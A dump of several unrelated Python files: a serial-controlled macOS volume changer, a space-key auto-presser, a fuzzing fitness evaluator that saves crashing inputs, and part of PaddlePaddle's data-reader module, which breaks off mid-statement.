self.cumulative_timings.add_timing(path, duration, is_tool)
self.self_timings.add_timing(path, self_time, is_tool)
self.outcomes[path] = workunit.outcome_string(workunit.outcome())
def get_background_root_workunit(self):
if self._background_root_workunit is None:
self._background_root_workunit = WorkUnit(run_info_dir=self.run_info_dir, parent=None,
name='background', cmd=None)
self._background_root_workunit.start()
self.report.start_workunit(self._background_root_workunit)
return self._background_root_workunit
def background_worker_pool(self):
if self._background_worker_pool is None: # Initialize lazily.
self._background_worker_pool = WorkerPool(parent_workunit=self.get_background_root_workunit(),
run_tracker=self,
num_workers=self._num_background_workers)
return self._background_worker_pool
def shutdown_worker_pool(self):
"""Shuts down the SubprocPool.
N.B. This exists only for internal use and to afford for fork()-safe operation in pantsd.
"""
SubprocPool.shutdown(self._aborted)
|
receiver.py
|
import serial
import asyncio
import multiprocessing
import subprocess
import sys
import glob
import json
import applescript
def setVolume(v):
subprocess.call(["osascript", "-e set volume output volume "+ str(v)])
return v
def inc_SC(n=1):
applescript.tell.app('System Events', 'tell process "SoundSource" to perform action "AXIncrement" of slider 1 of UI element '+str(n)+' of window 1')
def dec_SC(n=1):
applescript.tell.app('System Events', 'tell process "SoundSource" to perform action "AXDecrement" of slider 1 of UI element '+str(n)+' of window 1')
def translate(value, leftMin, leftMax, rightMin, rightMax):
# Figure out how 'wide' each range is
leftSpan = leftMax - leftMin
rightSpan = rightMax - rightMin
# Convert the left range into a 0-1 range (float)
valueScaled = float(value - leftMin) / float(leftSpan)
# Convert the 0-1 range into a value in the right range.
return rightMin + (valueScaled * rightSpan)
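# e.g. translate(50, 0, 100, -16, 16) == 0.0 and translate(75, 0, 100, -16, 16) == 8.0;
# this is how the 0-100 slider readings below are mapped onto the app's -16..16 sliders.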
def set_TB_Vol(v):
v = translate(v, 0, 100, -16, 16)
applescript.tell.app('System Events', 'tell process "Tonebridge Guitar Effects" to tell window "Tonebridge Guitar Effects" to tell splitter group 1 to set value of slider 2 to '+str(v))
def set_TB_FX(v):
v = translate(v, 0, 100, -16, 16)
applescript.tell.app('System Events', 'tell process "Tonebridge Guitar Effects" to tell window "Tonebridge Guitar Effects" to tell splitter group 1 to set value of slider 1 to '+str(v))
def serial_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def scan_for_audio():
global prev_A, serialPort, process
try:
new = int(serialPort.readline())# + (-100)
if prev_A != new:
if type(process[0]) is multiprocessing.Process:
process[0].terminate()
process[0] = multiprocessing.Process(target=setVolume, args=(new,))
process[0].start()
prev_A = new
subprocess.call(["clear"])
t = ("🔇" if new == 0 else "🔊" if new > 70 else "🔉" if new > 40 else "🔈") + str(new)
print(t)
except Exception as e:
print(e)
def scan_for_SC():
global prev_SC, serialPort, process
sliders = {
"0": 1,
"1": 2,
"2": 5,
"3": 7
}
try:
r = json.loads(serialPort.readline())# + (-100)
if list(r.values()) != list(prev_SC.values()):
subprocess.call(["clear"])
for p, v in r.items():
v = int(v)
if v >= prev_SC[p]+7:
inc_SC(sliders[p])
prev_SC[p] = v
elif v <= prev_SC[p]-7:
dec_SC(sliders[p])
prev_SC[p] = v
t = ("🔇" if v == 0 else "🔊" if v > 70 else "🔉" if v > 40 else "🔈") + str(v)
print(p+": ", t)
except Exception as e:
print(e)
def scan_for_TB():
global prev_TB, serialPort, process
sliders = {
"0": 1,
"1": 2,
}
slider_func = {
"0": set_TB_FX,
"1": set_TB_Vol,
}
slider_emoji = {
"0": ["💔 ", "❤️🩹 ", "❤️ ", "❤️🔥 "],
"1": ["🔇", "🔊", "🔉", "🔈"]
}
try:
r = json.loads(serialPort.readline())# + (-100)
if list(r.values()) != list(prev_TB.values()):
subprocess.call(["clear"])
for p, v in list(r.items())[:2]:
v = int(v)
if v != prev_TB[p]:
pr = int(p)
if type(process[pr]) is multiprocessing.Process:
process[pr].terminate()
process[pr] = multiprocessing.Process(target=slider_func[p], args=(v,))
process[pr].start()
prev_TB[p] = v
t = (slider_emoji[p][0] if v == 0 else slider_emoji[p][3] if v > 70 else slider_emoji[p][2] if v > 40 else slider_emoji[p][1]) + str(v)
print(p+": ", t)
except Exception as e:
print(e)
async def main():
global serialPort
while True:
if (serialPort.in_waiting > 0):
scan_for_TB()
if __name__ == '__main__':
prev_A = -1
prev_SC = {
"0": 100,
"1": 100,
"2": 100,
"3": 100
}
prev_TB = {
"0": 100,
"1": 100,
}
process = [None, None, None, None]
ports = list(filter((lambda x: "usb" in x), serial_ports()))
serial_com = ports[0]
if len(ports) > 1:
serial_com = ports[int(input("\n".join([str(i) + ": " + p for i, p in enumerate(ports)]) + "\nPort: "))]
serialPort = serial.Serial(port = serial_com, baudrate=9600,
bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE)
loop = asyncio.get_event_loop()
try:
asyncio.ensure_future(main())
loop.run_forever()
finally:
loop.close()
|
main.py
|
import random
import threading
import time
import winsound
import keyboard
def task():
t = threading.current_thread()
while getattr(t, 'do_run', True):
keyboard.press('space')
time.sleep(random.uniform(0.05, 0.1))
keyboard.release('space')
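# The loop above polls the 'do_run' attribute set on the Thread object, so the
# spammer can be stopped cooperatively: x() below sets thread.do_run = False,
# the current iteration finishes, and the while loop exits.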
def main():
global thread
global is_active
is_active = False
def x():
global thread
global is_active
if not is_active:
thread = threading.Thread(target=task)
thread.start()
print('Started with an interval between 0.05 and 0.1 seconds.')
else:
thread.do_run = False
thread.join()
del thread
winsound.Beep(1500, 150)
print('Stopped.')
is_active = not is_active
print('Press {0} key to start. Press {0} key again to stop. Press CTRL+C to Exit.'.format('DEL'))
keyboard.add_hotkey('del', x)
try:
keyboard.wait()
except KeyboardInterrupt:
print('Exit.')
if __name__ == "__main__":
main()
|
functors.py
|
import sys
import subprocess
import utils
import struct
import signal
import os
import time
import threading
# Functors used for evaluation purposes
class EvalFunctors:
def __init__(self, ProbabilityMap, noEdgeProbability, Mapping, entryTemplate, tracerProcess):
self.ProbabilityMap = ProbabilityMap
self.noEdgeProbability = noEdgeProbability
self.Mapping = Mapping
self.tracerProcess = tracerProcess
self.parentWorker = None
self.entryTemplate = entryTemplate
#self.headerFtm = entryTemplate.hF
#self.headerSize = entryTemplate.hS
#self.offsetFtm = entryTemplate.oF
#self.offsetSize = entryTemplate.oS
# alignment = 4 # this is the header alignment. how can we get this from code ?
# alignmentMask = ~(alignment - 1)
# InputString is a stream of bytes that is needed to evaluate the program
# We take this and give it as input to the executable and we want to get the trace from it
def getTrace(self, inputString):
# in this method we run simpletracer using an output pipe and get the result (trace output) from that pipe
tracer = self.tracerProcess
utils.writeToProcess(1, tracer, 1, False) # Wake up process and give it a task payload
tracer.stdin.write(bytearray(inputString))
tracer.stdin.flush()
# Guard against hangs: create a background timeout thread that
# will send a halt signal if the tracer takes too long
timeout = 1
def timeoutCallback(tracer, timeout):
time.sleep(timeout)
tracer.send_signal(signal.SIGHUP)
timeoutThread = threading.Thread(target=timeoutCallback, args=(tracer, timeout))
timeoutThread.daemon = True # run in the background
timeoutThread.start()
# Read the size of the returned buffer and data
receivedOutputSize = tracer.stdout.read(4)
if receivedOutputSize == b'Payl':
print("Payload not found!")
sys.exit(1)
# If the process has crashed, save the input and restart the tracer
if len(receivedOutputSize) == 0:
# Wait for process returncode
tracer.wait()
# Save crash info
self.saveCrashData(tracer, inputString)
# Restart tracer process
self.parentWorker.updateTracerProcess()
# Interesting inputString
return None, 0
streamSize = struct.unpack("I", receivedOutputSize)[0]
# print(streamSize)
streamData = tracer.stdout.read(streamSize)
return streamData, streamSize
def saveCrashData(self, tracerProcess, inputString):
from utils import logsFullPath
error_type = {
signal.SIGHUP: 'hup',
signal.SIGINT: 'int',
signal.SIGQUIT: 'quit',
signal.SIGILL: 'ill',
signal.SIGTRAP: 'trap',
signal.SIGABRT: 'abrt',
signal.SIGBUS: 'bus',
signal.SIGFPE: 'fpe',
signal.SIGUSR1: 'usr1',
signal.SIGSEGV: 'segv',
signal.SIGUSR2: 'usr2',
signal.SIGPIPE: 'pipe',
signal.SIGALRM: 'alrm',
signal.SIGTERM: 'term'
}
signalCode = -tracerProcess.returncode
if logsFullPath == "":
logsFullPath = '/home/boc/genetic-algorithm-with-Spark-for-test-generation/logs'
folder = logsFullPath + '/crash/' + error_type[signalCode]
# Create folder if it doesn't exist
os.makedirs(folder, exist_ok=True)
# Create new file and save the input that caused the crash
from uuid import uuid4
from datetime import datetime
now = datetime.now()  # avoid shadowing the imported 'time' module
time_str = "%d-%d-%d->%d-%d-%d" % (now.day, now.month, now.year,
now.hour, now.minute, now.second)
file_name = error_type[signalCode] + '-' + time_str + '-' + str(uuid4())[:8]
with open(folder + '/' + file_name + '.bin', 'wb') as f:
f.write(bytearray(inputString))
def processDataStream(self, dataStream, streamSize):
hashForEdges = set() # We don't count an edge if it appears twice
pathProbability = 1.0
# Caching some variables for faster access
entryType_TestName = self.entryTemplate.TN
entryType_Module = self.entryTemplate.TM
entryType_Offset = self.entryTemplate.TO
streamPos = 0
currModuleName = None
currentOffsetToEntryIndex = None
prevEntryIndex = -1
firstItem = 1
while streamPos < streamSize:
currOffset = -1
entry = utils.getNextEntryFromStream(dataStream, streamPos, self.entryTemplate)
entry_type = entry[0]  # renamed to avoid shadowing the built-in 'type'
entry_len = entry[1]  # renamed to avoid shadowing the built-in 'len'
moduleString = entry[2]
currOffset = entry[3]
cost = entry[4]
jumpType = entry[5]
entrySize = entry[6]
jumpInstruction = entry[7]
nInstructions = entry[8]
nextModule = entry[9]
nextoffset = entry[10]
streamPos += entrySize
if entry_type == entryType_Module:
currModuleName = moduleString
currentOffsetToEntryIndex = self.Mapping[currModuleName] if currModuleName in self.Mapping else None # Update the current map to search to
elif entry_type == entryType_Offset:
# use here currModuleName#offset
# Find the current entry index
currEntryIndex = -1
if currentOffsetToEntryIndex is not None and currOffset in currentOffsetToEntryIndex:
currEntryIndex = currentOffsetToEntryIndex[currOffset]
if firstItem == 0: # Don't compute probabilities for the first item because it could be misread as a missing edge in the probability graph
isNewEdge = True
bothNodesAreKnown = currEntryIndex != -1 and prevEntryIndex != -1
if bothNodesAreKnown: # If one of the nodes doesn't exist, always consider it a new edge.
isNewEdge = not (prevEntryIndex, currEntryIndex) in hashForEdges
if isNewEdge:
hashForEdges.add((prevEntryIndex, currEntryIndex))
if isNewEdge:
edgeProb = self.getEdgeProbability(prevEntryIndex,
currEntryIndex) if bothNodesAreKnown else self.noEdgeProbability
pathProbability = pathProbability * edgeProb
firstItem = 0
prevEntryIndex = currEntryIndex
elif entry_type == entryType_TestName:
continue # we are not interested in this type of data
return 1.0 - pathProbability
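# Illustrative example: a trace crossing two previously unseen edges with
# probabilities 0.5 and 0.25 gives pathProbability == 0.125, so the returned
# fitness is 1.0 - 0.125 == 0.875 (rarer paths score higher).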
# Get the probability of an edge knowing the probability map and the
# noEdgeProbability value, as defined in the computeProbabilitiesMap function.
def getEdgeProbability(self, idA, idB):
neighbOfA = self.ProbabilityMap[idA] # get the dictionary of neighbors for node idA
if neighbOfA is None:
return self.noEdgeProbability
edgeValue = neighbOfA.get(idB)
return edgeValue if edgeValue is not None else self.noEdgeProbability
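# Illustrative sketch of the ProbabilityMap shape assumed by the lookup above
# (an assumption, not taken from this file): indexable by node id, with each entry
# mapping neighbor ids to edge probabilities, e.g.
#   ProbabilityMap = {0: {1: 0.7, 2: 0.3}, 1: {2: 1.0}, 2: None}
# Unknown neighbors (and nodes mapped to None) fall back to noEdgeProbability.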
# This function currently tests the program against an input,
# gets the Trace and computes the probability of the path.
# Fitness score is 1-pathProbability.
# We don't consider same edge twice.
# We must play/improve this a lot. E.g. - consider that first part of
# the path could be very common and this should influence less the costs.
def evaluate(self, inputString):
streamData, streamSize = self.getTrace(inputString)
return self.processDataStream(streamData, streamSize)
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import multiprocessing
import os
import six
import sys
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
import logging
from ..data_feeder import check_dtype, check_type
__all__ = [
'data', 'read_file', 'double_buffer', 'py_reader',
'create_py_reader_by_data', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This operator creates the global variable. The global variables can be
accessed by all the following operators in the graph.
Note:
:code:`paddle.fluid.layers.data` is deprecated as it will be removed in
a later version. Please use :code:`paddle.fluid.data` .
This :code:`paddle.fluid.layers.data` set shape and dtype at compile
time but does NOT check the shape or the dtype of fed data, the
:code:`paddle.fluid.data` checks the shape and the dtype of data fed
by Executor or ParallelExecutor during run time.
To feed variable size inputs, users can feed variable size inputs
directly to this :code:`paddle.fluid.layers.data` and PaddlePaddle will
fit the size accordingly. Or set -1 on the variable dimension when using
:code:`paddle.fluid.data` .
The default :code:`stop_gradient` attribute of the Variable created by
this API is true, which means the gradient won't be passed backward
through the data Variable. Set :code:`var.stop_gradient = False` if the
user would like to pass gradients backward.
Args:
name(str): The name/alias of the variable, see :ref:`api_guide_Name`
for more details.
shape(list|tuple): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of each sample. Otherwise, it should
be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1]. This will
be useful to set different batch size at run time.
2. If shape contains -1, such as shape=[1, -1].
append_batch_size will be enforced to be False (ineffective)
because PaddlePaddle cannot set more than 1 unknown number on the
shape.
dtype(np.dtype|VarType|str): The type of the data. Supported dtype: bool,
float16, float32, float64, int8, int16, int32, int64, uint8.
type(VarType): The output type. Supported dtype: VarType.LOD_TENSOR,
VarType.SELECTED_ROWS, VarType.NCCL_ID. Default: VarType.LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
Default: 0.
stop_gradient(bool): A boolean indicating whether gradients should flow.
Default: True.
Returns:
The global variable that gives access to the data.
Return Type:
Variable
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
check_type(name, 'name', (six.binary_type, six.text_type), 'data')
check_type(shape, 'shape', (list, tuple), 'data')
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
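# Illustrative examples of the shape handling above:
#   data(name='x', shape=[784])                                  -> shape [-1, 784]
#   data(name='x', shape=[None, 784])                            -> shape [-1, 784] (append_batch_size forced off)
#   data(name='x', shape=[3, 224, 224], append_batch_size=False) -> shape [3, 224, 224]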
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create an RPC server that binds and listens
on a specific TCP port; the server will run the sub-block when it
receives variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many clients are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
import paddle.fluid as fluid
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
from ..incubate.fleet.parameter_server.mode import DistributedMode
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # multiple optimize blocks are not yet supported in layers
'distributed_mode':
DistributedMode.SYNC, # async mode is not yet supported in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
Send variables to the server side, and get vars from the server
side when the server has finished running the server-side program.
Args:
endpoints (str): comma separated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait for the request to finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma separated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait for the request to finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
need_check_feed = [0 for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
dtype_int = [int(t) for t in dtypes]
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity, False)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.kill()
logging.warn('Your decorated reader has raised an exception!')
six.reraise(*sys.exc_info())
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
:api_attr: Static Graph
Create a Python reader for data feeding in Python
This operator returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source and feed the data from the data source to the Reader Variable.
When :code:`Executor::Run()` is invoked in C++ side, the data from the
generator would be read automatically. Unlike :code:`DataFeeder.feed()`,
the data reading process and :code:`Executor::Run()` process can run in
parallel using :code:`py_reader`. The :code:`start()` method of the Reader
should be called when each pass begins, while the :code:`reset()` method
should be called when the pass ends and :code:`fluid.core.EOFException` is raised.
Note:
:code:`Program.clone()` method cannot clone :code:`py_reader`. You can
refer to :ref:`api_fluid_Program` for more details.
The :code:`read_file` call needs to be in the program block of :code:`py_reader`.
You can refer to :ref:`api_fluid_layers_read_file` for more details.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples declaring the data shapes. shapes[i]
represents the i-th data shape.
dtypes(list|tuple): List of strings declaring the data types. Supported dtype:
bool, float16, float32, float64, int8, int16, int32, int64, uint8.
lod_levels(list|tuple): List of ints declaring the data lod_level.
name(basestring): The default value is None. Normally there is no
need for the user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
use_double_buffer(bool): Whether to use double buffering or not. The double buffer is
for pre-reading the data of the next batch and copying the data asynchronously
from CPU to GPU. Default is True.
Returns:
A Reader from which we can get feeding data.
Return Type:
Variable
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
# user defined network, here a softmax regression example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as an example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
logging.warn(
'paddle.fluid.layers.py_reader() may be deprecated in the near future. '
